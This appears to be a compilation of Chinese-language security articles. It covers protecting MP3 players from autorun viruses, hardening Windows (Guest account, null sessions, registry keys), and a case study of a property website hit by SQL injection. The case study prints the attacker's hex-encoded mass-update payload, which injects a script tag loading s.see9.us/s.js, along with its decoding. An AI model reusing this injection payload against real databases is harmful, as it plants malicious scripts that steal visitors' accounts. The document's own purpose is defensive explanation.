在我們使用MP3播放器的過程中,經常要把MP3和計算機連接後進行文件拷貝,這樣就很容易發生MP3播放器被病毒感染的情況。那麼我們應該從下面幾個方面來進行預防:
1.打開寫保護開關。如果MP3播放器帶有寫保護開關,並且也沒有往設備上寫文件時,最好在連到計算機前打開寫保護開關,這樣就從源頭上切斷了病毒傳播的途徑。
2.安裝移動版殺毒軟件。現在多知名殺毒廠家都推出了專門針對MP3、閃存和移動硬盤等移動設備使用的殺毒軟件。當然安裝上移動版殺毒軟件後,我們要及時升級病毒庫,這樣才能做到防患於未然。
3.手動更改目錄內容。如果你的MP3播放器沒有寫保護開關,同時也沒有移動版殺毒軟件,那麼還有一個較為簡單的辦法來防止病毒的入侵。在MP3播放器根目錄下面通過記事本工具手工創建一個名字為“Autorun.inf文件,這樣一來一些病毒日後就無法往MP3播放器根目錄下面自動生成“Autorun.inf文件了,無法通過MP3播放器進行非法傳播。同樣,這種預防病毒的方法也適用於移動硬盤。該方法可以防止多數低級病毒的入侵,但如果遇到高級黑客編寫的病毒,則應用其他方法防毒。
4.有病毒則應格式化。即便是采取了這些措施,有時候也無法徹底避免MP3感染病毒的現象。我們的MP3感染病毒後怎麼辦呢?這時一定要注意,在沒有對病毒進行處理之前,不要把該MP3連接到別的計算機上使用,因為那樣可能會造成交叉感染,進一步擴大病毒的傳播范圍。這時候我們要做的是對MP3播放器進行格式化處理,在格式化的過程中,要特別注意選擇正確的文件格式。另外要盡可能地采用廠家提供的格式化程序(一般廠家的隨機光盤中或者官方網站上都提供),否則可能會出現格式化後MP3無法正常使用的問題。
2008北京奧運會一天天的臨近了。作為互聯網也第一次登上了奧運的舞台。面對復雜的國際形式,如何才能保障互聯網的安全,也已成為我們的同識。前幾天我們報道了有關國外黑客要借北京奧運報復中國的新聞。除了那些奧運黑客,還有很多敵對勢力也在虎勢眈眈。現在我想通過我們前一段時間的介紹,大家對“肉雞也有所了解了。拒絕成為“肉雞,為奧運盡我們綿薄之力。下面,編輯在為大家介紹一些有關系統安全方面的技巧。
一、關閉“文件和打印共享
文件和打印共享應該是一個非常有用的功能,但在不需要它的時候,也是黑客入侵的很好的安全漏洞。所以在沒有必要“文件和打印共享的情況下,我們可以將它關閉。用鼠標右擊“網絡鄰居,選擇“屬性,然後單擊“文件和打印共享按鈕,將彈出的“文件和打印共享對話框中的兩個復選框中的鉤去掉即可。
雖然“文件和打印共享關閉了,但是還不能確保安全,還要修改注冊表,禁止它人更改“文件和打印共享。打開注冊表編輯器,選擇
“HKEY_CURRENT_USER/Software/Microsoft/Windows/
CurrentVersion/PolicIEs/NetWork
主鍵,在該主鍵下新建DWord類型的鍵值,鍵值名為“NoFileSharingControl,鍵值設為“1表示禁止這項功能,從而達到禁止更改“文件和打印共享的目的;鍵值為“0表示允許這項功能。這樣在“網絡鄰居的“屬性對話框中“文件和打印共享就不復存在了。
二、把Guest賬號禁用
有很多入侵都是通過這個賬號進一步獲得管理員密碼或者權限的。如果不想把自己的計算機給別人當玩具,那還是禁止的好。打開控制面板,雙擊“用戶和密碼,單擊“高級選項卡,再單擊“高級按鈕,彈出本地用戶和組窗口。在Guest賬號上面點擊右鍵,選擇屬性,在“常規頁中選中“賬戶已停用。另外,將Administrator賬號改名可以防止黑客知道自己的管理員賬號,這會在很大程度上保證計算機安全。
三、禁止建立空連接
在默認的情況下,任何用戶都可以通過空連接連上服務器,枚舉賬號並猜測密碼。因此,我們必須禁止建立空連接。方法是修改注冊表:打開注冊表
“HKEY_LOCAL_MacHINE/System/CurrentControlSet/Control/LSA,
將DWORD值“RestrictAnonymous的鍵值改為“1即可。
四、隱藏IP地址
黑客經常利用一些網絡探測技術來查看我們的主機信息,主要目的就是得到網絡中主機的IP地址。IP地址在網絡安全上是一個很重要的概念,如果攻擊者知道了你的IP地址,等於為他的攻擊准備好了目標,他可以向這個IP發動各種進攻,如Dos( 拒絕服務 )攻擊、Floop溢出攻擊等。隱藏IP地址的主要方法是使用代理服務器。 與直接連接到Internet相比,使用代理服務器能保護上網用戶的IP地址,從而保障上網安全。
代理服務器的原理是在客戶機(用戶上網的計算機)和遠程服務器(如用戶想訪問遠端WWW服務器)之間架設一個“中轉站,當客戶機向遠程服務器提出服務要求後,代理服務器首先截取用戶的請求,然後代理服務器將服務請求轉交遠程服務器,從而實現客戶機和遠程服務器之間的聯系。很顯然,使用代理服務器後,其它用戶只能探測到代理服務器的IP地址而不是用戶的IP地址,這就實現了隱藏用戶IP地址的目的,保障了用戶上網安全。提供免費代理服務器的網站有很多,你也可以自己用代理獵手等工具來查找。
SQL注入作為直接威脅web業務的最嚴重攻擊行為,已經被大多數的網站管理員所了解,這種通過HTTP標准端口,利用網頁編碼不嚴謹,提交精心構造的代碼實現對數據庫非授權訪問的攻擊方法,已經被越來越多的scriptguy(腳本小子)成功掌握並廣泛實踐。沒錯,他們可能並不知道SQL注入的原理,不知道ASP,不知道PHP,但他們有工具,全自動的,完善的,高效率的工具,這些工具使得任何一個有簡單網絡知識的中學學生可以很容易的拿到某個政府網站的最高管理員權限,而且做這些事情並不會比你在周六的中午下樓去買一聽可樂要更困難。
而隨著互聯網黑色產業鏈的浮出水面,駭客們發現攻擊網站不僅僅可以用作向朋友炫耀的資本,還可以作為購買游戲點卡或者是數碼相機的資金來源:在被攻擊的網站嵌入腳本木馬,可以輕易盜竊那些訪問了受攻擊網站,但個人PC安全防護措施不全面用戶的私密信息,比如游戲賬號密碼,或者是銀行賬號密碼。
經常使用google的用戶一定對這段話不陌生“該網站可能含有惡意軟件,有可能會危害您的電腦,這意味著這個網站也許已經遭遇掛馬黑手,成為駭客們的眾多取款點之一。本文就一例真實案例,來介紹一下網站的安全防護。
某市房地產網站的管理員小李剛上班就被叫到領導辦公室去了,因為網站帶上了google小尾巴:“該網站可能含有惡意軟件,有可能會危害您的電腦,購房者看到這一提示信息,紛紛給該市房產管理局打電話,於是就有了上面的一幕。回到座位上的小李一籌莫展:網站服務器已經全盤殺毒好幾次了,沒有發現病毒存在的痕跡,看來只能找專業安全廠商解決了。小李選擇的是國內著名的一家網絡安全公司,在向該安全公司提交web日志的第二天,小李就收到了回信,從日志的分析結果中,可以清楚的看到駭客的攻擊走向:這是一次非常典型的SQL注入攻擊,首先使用dEcLaRe建立游標,遍歷數據庫中所有允許寫入字符串的相關字段,並通過執行exec操作,使用update語句替換了網站頁面的正常文件,插入了如下一段十六進制字符:
exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20f
經過解密,可以得到如下字符串
"][/title][script src=http://s.see9.us/s.js][/script][!—
這裡面的http://s.see9.us/s.js就是導致網站帶有小尾巴的罪魁禍首。
經過一天的奮力工作,網頁中所有的小尾巴都清理干淨了,在安全工程師的建議下,小李還向StopBadware.org 申請了重新的索引,並向google提交了審核申請。做完了這些之後,小李又一次陷入了困擾:如何防范網站再次遭受SQL注入攻擊呢?網絡上提供了一些代碼修改級的防御方法,可是需要對每一個頁面都做仔細的檢查,看著自己所負責網站的10000余個頁面,小李只能是苦笑,聯想起2007年夏天那次微軟